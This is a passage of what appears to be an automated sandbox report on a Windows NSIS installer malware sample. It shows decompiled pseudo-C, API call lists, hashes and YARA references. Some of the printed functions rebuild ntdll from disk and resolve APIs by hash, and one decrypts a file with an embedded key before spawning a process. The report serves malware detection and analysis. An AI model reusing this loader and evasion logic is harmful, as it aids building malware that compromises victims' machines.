				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x42f514 =  *0x42f514 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffee);
					} else {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffe9);
						lstrcatA(0x40a450,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x40a450);
					E00405969();
					goto L29;
				}
				goto L33;
			}
















                                                                                        0x00401759
                                                                                        0x00401760
                                                                                        0x00401769
                                                                                        0x0040176c
                                                                                        0x0040176f
                                                                                        0x00401774
                                                                                        0x0040177c
                                                                                        0x00401798
                                                                                        0x0040177e
                                                                                        0x0040177e
                                                                                        0x0040177f
                                                                                        0x0040177f
                                                                                        0x0040179e
                                                                                        0x004017a8
                                                                                        0x004017a8
                                                                                        0x004017ac
                                                                                        0x004017af
                                                                                        0x004017b4
                                                                                        0x004017b6
                                                                                        0x004017b8
                                                                                        0x004017bd
                                                                                        0x004017bd
                                                                                        0x004017c8
                                                                                        0x004017c8
                                                                                        0x004017d9
                                                                                        0x004017db
                                                                                        0x004017db
                                                                                        0x004017dc
                                                                                        0x004017dc
                                                                                        0x004017df
                                                                                        0x004017e2
                                                                                        0x004017e5
                                                                                        0x004017e5
                                                                                        0x004017ec
                                                                                        0x004017fb
                                                                                        0x00401800
                                                                                        0x00401803
                                                                                        0x00401806
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00401808
                                                                                        0x0040180b
                                                                                        0x00401865
                                                                                        0x0040186a
                                                                                        0x004015b0
                                                                                        0x004027bf
                                                                                        0x004027bf
                                                                                        0x00402a5a
                                                                                        0x00402a5d
                                                                                        0x00402a5d
                                                                                        0x00000000
                                                                                        0x0040180d
                                                                                        0x00401813
                                                                                        0x0040181e
                                                                                        0x0040182b
                                                                                        0x00401836
                                                                                        0x0040184c
                                                                                        0x0040184c
                                                                                        0x0040184f
                                                                                        0x00000000
                                                                                        0x00401855
                                                                                        0x00401855
                                                                                        0x00401856
                                                                                        0x00401873
                                                                                        0x00402a63
                                                                                        0x00402a63
                                                                                        0x00402a63
                                                                                        0x00401858
                                                                                        0x00401858
                                                                                        0x00401859
                                                                                        0x00401492
                                                                                        0x00402387
                                                                                        0x00402387
                                                                                        0x00402387
                                                                                        0x00401856
                                                                                        0x0040184f
                                                                                        0x00402a65
                                                                                        0x00402a69
                                                                                        0x00402a69
                                                                                        0x00401883
                                                                                        0x00401888
                                                                                        0x00401896
                                                                                        0x0040189b
                                                                                        0x004018a1
                                                                                        0x004018a5
                                                                                        0x004018a7
                                                                                        0x004018af
                                                                                        0x004018bb
                                                                                        0x004018a9
                                                                                        0x004018a9
                                                                                        0x004018ad
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004018ad
                                                                                        0x004018c4
                                                                                        0x004018ca
                                                                                        0x004018cc
                                                                                        0x00000000
                                                                                        0x004018d2
                                                                                        0x004018d2
                                                                                        0x004018d5
                                                                                        0x004018ed
                                                                                        0x004018d7
                                                                                        0x004018da
                                                                                        0x004018e3
                                                                                        0x004018e3
                                                                                        0x004018f2
                                                                                        0x004018f7
                                                                                        0x00402382
                                                                                        0x00000000
                                                                                        0x00402382
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                                          • Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A
                                                                                          • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                          • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                          • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                          • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll$Call
                                                                                        • API String ID: 1941528284-3933861923
                                                                                        • Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                        • Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
                                                                                        • Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                        • Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FC23705, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 69%
                                                                                        			E6FC23705(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr _v80;
				signed char _v84;
				long _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				char _v108;
				short _t141;
				short _t142;
				short _t143;
				short _t144;
				short _t145;
				short _t146;
				short _t147;
				short _t148;
				short _t149;
				int _t165;
				intOrPtr _t175;
				signed int _t195;
				signed int _t210;
				signed int _t222;

				_v24 = _v24 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t141 = 0x6e;
				_v108 = _t141;
				_t142 = 0x74;
				_v106 = _t142;
				_t143 = 0x64;
				_v104 = _t143;
				_t144 = 0x6c;
				_v102 = _t144;
				_t145 = 0x6c;
				_v100 = _t145;
				_t146 = 0x2e;
				_v98 = _t146;
				_t147 = 0x64;
				_v96 = _t147;
				_t148 = 0x6c;
				_v94 = _t148;
				_t149 = 0x6c;
				_v92 = _t149;
				_v90 = 0;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_t23 =  &_v44;
				 *_t23 = _v44 & 0x00000000;
				_t222 =  *_t23;
				_v20 = E6FC24582();
				_v64 = E6FC2462A(_v20, 0x8a111d91);
				_v68 = E6FC2462A(_v20, 0x170c1ca1);
				_v52 = E6FC2462A(_v20, 0xa5f15738);
				_v72 = E6FC2462A(_v20, 0x433a3842);
				_v56 = E6FC2462A(_v20, 0xd6eb2188);
				_v60 = E6FC2462A(_v20, 0x50a26af);
				_v80 = E6FC2462A(_v20, 0x55e38b1f);
				_v44 = 1;
				while(1) {
					_v16 = CreateFileW(E6FC24785(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
					if(_v16 == 0xffffffff) {
						break;
					}
					_v36 = _v68(_v16, 0);
					__eflags = _v36 - 0xffffffff;
					if(_v36 != 0xffffffff) {
						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
						__eflags = _v12;
						if(_v12 != 0) {
							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
							__eflags = _t165;
							if(_t165 != 0) {
								_v76 = _v12;
								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
								_t213 = _v32;
								_v40 = _v32 + ( *(_v32 + 0x14) & 0x0000ffff) + 0x18;
								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
								__eflags = _v24;
								if(_v24 != 0) {
									E6FC2459A(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
									_v28 = _v28 & 0x00000000;
									while(1) {
										_t175 = _v32;
										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
											break;
										}
										E6FC2459A(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
										_t210 = _v28 + 1;
										__eflags = _t210;
										_v28 = _t210;
									}
									_v48 = E6FC2462A(_v24, _a4);
									__eflags = _v48;
									if(_v48 != 0) {
										__eflags = _v16;
										if(_v16 != 0) {
											FindCloseChangeNotification(_v16);
										}
										__eflags = _v12;
										if(_v12 != 0) {
											VirtualFree(_v12, 0, 0x8000);
										}
										_v44 = _v44 & 0x00000000;
										__eflags = 0;
										if(0 != 0) {
											continue;
										}
									} else {
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
					L22:
					if(_v44 != 0) {
						if(_v16 != 0) {
							_v56(_v16);
						}
						_v80(0);
					}
					_v8 = _v48;
					while(1 != 0) {
						if(( *_v8 & 0x000000ff) != 0xb8) {
							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
							if(( *_v8 & 0x000000ff) != 0xe9) {
								__eflags = ( *_v8 & 0x000000ff) - 0xea;
								if(( *_v8 & 0x000000ff) != 0xea) {
									_t195 = _v8 + 1;
									__eflags = _t195;
									_v8 = _t195;
								} else {
									_v8 =  *(_v8 + 1);
								}
							} else {
								_t125 =  *(_v8 + 1) + 5; // 0x5
								_v8 = _v8 + _t125;
							}
							continue;
						} else {
						}
						break;
					}
					_v8 = _v8 + 1;
					_v84 =  *_v8;
					if(_v24 != 0) {
						VirtualFree(_v24, 0, 0x8000);
					}
					return _v84;
				}
				goto L22;
			}
















































                                                                                        0x6fc2370b
                                                                                        0x6fc2370f
                                                                                        0x6fc23713
                                                                                        0x6fc23719
                                                                                        0x6fc2371a
                                                                                        0x6fc23720
                                                                                        0x6fc23721
                                                                                        0x6fc23727
                                                                                        0x6fc23728
                                                                                        0x6fc2372e
                                                                                        0x6fc2372f
                                                                                        0x6fc23735
                                                                                        0x6fc23736
                                                                                        0x6fc2373c
                                                                                        0x6fc2373d
                                                                                        0x6fc23743
                                                                                        0x6fc23744
                                                                                        0x6fc2374a
                                                                                        0x6fc2374b
                                                                                        0x6fc23751
                                                                                        0x6fc23752
                                                                                        0x6fc23758
                                                                                        0x6fc2375c
                                                                                        0x6fc23760
                                                                                        0x6fc23764
                                                                                        0x6fc23768
                                                                                        0x6fc23768
                                                                                        0x6fc23768
                                                                                        0x6fc23771
                                                                                        0x6fc23781
                                                                                        0x6fc23791
                                                                                        0x6fc237a1
                                                                                        0x6fc237b1
                                                                                        0x6fc237c1
                                                                                        0x6fc237d1
                                                                                        0x6fc237e1
                                                                                        0x6fc237e4
                                                                                        0x6fc237eb
                                                                                        0x6fc2380a
                                                                                        0x6fc23811
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fc23820
                                                                                        0x6fc23823
                                                                                        0x6fc23827
                                                                                        0x6fc2383d
                                                                                        0x6fc23840
                                                                                        0x6fc23844
                                                                                        0x6fc2385a
                                                                                        0x6fc2385d
                                                                                        0x6fc2385f
                                                                                        0x6fc23869
                                                                                        0x6fc23875
                                                                                        0x6fc2387f
                                                                                        0x6fc23886
                                                                                        0x6fc2389b
                                                                                        0x6fc2389e
                                                                                        0x6fc238a2
                                                                                        0x6fc238b5
                                                                                        0x6fc238ba
                                                                                        0x6fc238c7
                                                                                        0x6fc238c7
                                                                                        0x6fc238ce
                                                                                        0x6fc238d1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fc238fc
                                                                                        0x6fc238c3
                                                                                        0x6fc238c3
                                                                                        0x6fc238c4
                                                                                        0x6fc238c4
                                                                                        0x6fc2390e
                                                                                        0x6fc23911
                                                                                        0x6fc23915
                                                                                        0x6fc23919
                                                                                        0x6fc2391d
                                                                                        0x6fc23922
                                                                                        0x6fc23922
                                                                                        0x6fc23925
                                                                                        0x6fc23929
                                                                                        0x6fc23935
                                                                                        0x6fc23935
                                                                                        0x6fc23938
                                                                                        0x6fc2393c
                                                                                        0x6fc2393e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fc23917
                                                                                        0x00000000
                                                                                        0x6fc238a4
                                                                                        0x00000000
                                                                                        0x6fc23861
                                                                                        0x00000000
                                                                                        0x6fc23846
                                                                                        0x00000000
                                                                                        0x6fc23829
                                                                                        0x6fc23944
                                                                                        0x6fc23948
                                                                                        0x6fc2394e
                                                                                        0x6fc23953
                                                                                        0x6fc23953
                                                                                        0x6fc23958
                                                                                        0x6fc23958
                                                                                        0x6fc2395e
                                                                                        0x6fc23961
                                                                                        0x6fc23971
                                                                                        0x6fc2397b
                                                                                        0x6fc23980
                                                                                        0x6fc2399a
                                                                                        0x6fc2399f
                                                                                        0x6fc239af
                                                                                        0x6fc239af
                                                                                        0x6fc239b0
                                                                                        0x6fc239a1
                                                                                        0x6fc239a7
                                                                                        0x6fc239a7
                                                                                        0x6fc23982
                                                                                        0x6fc2398b
                                                                                        0x6fc2398f
                                                                                        0x6fc2398f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x6fc23973
                                                                                        0x00000000
                                                                                        0x6fc23971
                                                                                        0x6fc239b9
                                                                                        0x6fc239c1
                                                                                        0x6fc239c8
                                                                                        0x6fc239d4
                                                                                        0x6fc239d4
                                                                                        0x6fc239dd
                                                                                        0x6fc239dd
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,55E38B1F,?,050A26AF,?,D6EB2188,?,433A3842), ref: 6FC23807
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 6FC239D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336002347.000000006FC23000.00000040.00020000.sdmp, Offset: 6FC20000, based on PE: true
                                                                                        • Associated: 00000001.00000002.335954457.000000006FC20000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.335970994.000000006FC21000.00000080.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.335995426.000000006FC22000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336018479.000000006FC25000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CreateFileFreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 204039940-0
                                                                                        • Opcode ID: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                                        • Instruction ID: 36e26a9abcccf1734293fa790402c7e382aacf71699086e3c95b489a232561ee
                                                                                        • Opcode Fuzzy Hash: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                                        • Instruction Fuzzy Hash: E6A1EF70E04209EFDB00DFA4D986BEDBBF1FF09716F20855AE610BA2A0E3755A44DB14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040583A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040583A(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                        0x00405845
                                                                                        0x00405849
                                                                                        0x0040584c
                                                                                        0x00405852
                                                                                        0x00405856
                                                                                        0x0040585a
                                                                                        0x00405862
                                                                                        0x00405869
                                                                                        0x0040586f
                                                                                        0x00405876
                                                                                        0x0040587d
                                                                                        0x00405885
                                                                                        0x00405887
                                                                                        0x00000000
                                                                                        0x00405887
                                                                                        0x00405891
                                                                                        0x00405898
                                                                                        0x004058ae
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004058b0
                                                                                        0x004058b4

                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                        • GetLastError.KERNEL32 ref: 00405891
                                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
                                                                                        • GetLastError.KERNEL32 ref: 004058B0
                                                                                        Strings
                                                                                        • C:\Users\user\Desktop, xrefs: 0040583A
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405860
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                        • API String ID: 3449924974-1229045261
                                                                                        • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                        • Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
                                                                                        • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                        • Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004065E8, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004065E8(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                                        0x004065ff
                                                                                        0x00406608
                                                                                        0x0040660a
                                                                                        0x0040660a
                                                                                        0x0040660e
                                                                                        0x00406620
                                                                                        0x0040661a
                                                                                        0x0040661a
                                                                                        0x0040661a
                                                                                        0x00406624
                                                                                        0x00406638
                                                                                        0x0040664c
                                                                                        0x00406653

                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 004065FF
                                                                                        • wsprintfA.USER32 ref: 00406638
                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                                        • API String ID: 2200240437-4240819195
                                                                                        • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                        • Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
                                                                                        • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                        • Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FC242BE, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207filememoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 71%
                                                                                        			E6FC242BE(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				long _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v140;
				char _v208;
				char _v1248;
				signed int _t124;
				void* _t126;
				void* _t130;
				signed int _t131;
				void* _t132;
				int _t134;
				int _t137;
				signed int _t147;
				void* _t149;
				signed int _t150;
				void* _t152;
				signed int _t153;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;

				_t159 = __eflags;
				_t157 = __edx;
				_t156 = __ecx;
				_v20 = _v20 & 0x00000000;
				_v84 = _v84 & 0x00000000;
				_v56 = 0x61;
				_v55 = 0x36;
				_v54 = 0x32;
				_v53 = 0x61;
				_v52 = 0x62;
				_v51 = 0x31;
				_v50 = 0x37;
				_v49 = 0x34;
				_v48 = 0x34;
				_v47 = 0x62;
				_v46 = 0x61;
				_v45 = 0x66;
				_v44 = 0x34;
				_v43 = 0x65;
				_v42 = 0x63;
				_v41 = 0x64;
				_v40 = 0x62;
				_v39 = 0x61;
				_v38 = 0x33;
				_v37 = 0x32;
				_v36 = 0x33;
				_v35 = 0x65;
				_v34 = 0x36;
				_v33 = 0x35;
				_v32 = 0x62;
				_v31 = 0x39;
				_v30 = 0x35;
				_v29 = 0x30;
				_v28 = 0x62;
				_v27 = 0x61;
				_v26 = 0x33;
				_v25 = 0x37;
				_v24 = 0;
				_v16 = _v16 & 0x00000000;
				_v116 = _v116 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v8 = E6FC24582();
				_v60 = E6FC2462A(_v8, 0x34cf0bf);
				_v64 = E6FC2462A(_v8, 0x55e38b1f);
				_v68 = E6FC2462A(_v8, 0xd1775dc4);
				_v120 = E6FC2462A(_v8, 0xd6eb2188);
				_v96 = E6FC2462A(_v8, 0xa2eae210);
				_v124 = E6FC2462A(_v8, 0xcd8538b2);
				_v72 = E6FC2462A(_v8, 0x8a111d91);
				_v76 = E6FC2462A(_v8, 0x170c1ca1);
				_v80 = E6FC2462A(_v8, 0xa5f15738);
				_v88 = E6FC2462A(_v8, 0x433a3842);
				_v92 = E6FC2462A(_v8, 0x2ffe2c64);
				_v112 = 0x2d734193;
				_v108 = 0x63daa681;
				_v104 = 0x26090612;
				_v100 = 0x6f28fae0;
				_t124 = 4;
				_t126 = E6FC2421B(_t159,  *((intOrPtr*)(_t158 + _t124 * 0 - 0x6c))); // executed
				_t160 = _t126;
				if(_t126 != 0) {
					L4:
					_v60(0x7918);
					L5:
					_v68(0,  &_v1248, 0x103);
					_t130 = CreateFileW(_a4, 0x80000000, 7, 0, 3, 0x80, 0);
					_v20 = _t130;
					if(_v20 != 0xffffffff) {
						_t131 = _v76(_v20, 0);
						_v16 = _t131;
						__eflags = _v16 - 0xffffffff;
						if(_v16 != 0xffffffff) {
							_t132 = VirtualAlloc(0, _v16, 0x3000, 4);
							_v12 = _t132;
							__eflags = _v12;
							if(_v12 != 0) {
								_t134 = ReadFile(_v20, _v12, _v16,  &_v84, 0);
								__eflags = _t134;
								if(_t134 != 0) {
									_t99 =  &_v56; // 0x61
									E6FC2401F(_v12, _t99, 0x20);
									_t137 = E6FC23034(_t156, _t157, __eflags, _v12); // executed
									__eflags = _t137;
									if(_t137 != 0) {
										_v60(0xbb8);
										E6FC23005(_t156,  &_v140, 0x10);
										E6FC23005(_t156,  &_v208, 0x44);
										_t137 = _v96( &_v1248, _v92(0, 0, 0, 0x20, 0, 0,  &_v208,  &_v140));
										__eflags = _t137;
										if(_t137 != 0) {
											_t137 = _v64(0);
										}
									}
									ExitProcess(0);
								}
								return _t134;
							}
							return _t132;
						}
						return _t131;
					}
					return _t130;
				}
				_t147 = 4;
				_t149 = E6FC2421B(_t160,  *((intOrPtr*)(_t158 + (_t147 << 0) - 0x6c))); // executed
				_t161 = _t149;
				if(_t149 != 0) {
					goto L4;
				}
				_t150 = 4;
				_t152 = E6FC2421B(_t161,  *((intOrPtr*)(_t158 + (_t150 << 1) - 0x6c))); // executed
				_t162 = _t152;
				if(_t152 != 0) {
					goto L4;
				}
				_t153 = 4;
				_t155 = E6FC2421B(_t162,  *((intOrPtr*)(_t158 + _t153 * 3 - 0x6c))); // executed
				if(_t155 == 0) {
					goto L5;
				}
				goto L4;
			}













































































                                                                                        0x6fc242be
                                                                                        0x6fc242be
                                                                                        0x6fc242be
                                                                                        0x6fc242c7
                                                                                        0x6fc242cb
                                                                                        0x6fc242cf
                                                                                        0x6fc242d3
                                                                                        0x6fc242d7
                                                                                        0x6fc242db
                                                                                        0x6fc242df
                                                                                        0x6fc242e3
                                                                                        0x6fc242e7
                                                                                        0x6fc242eb
                                                                                        0x6fc242ef
                                                                                        0x6fc242f3
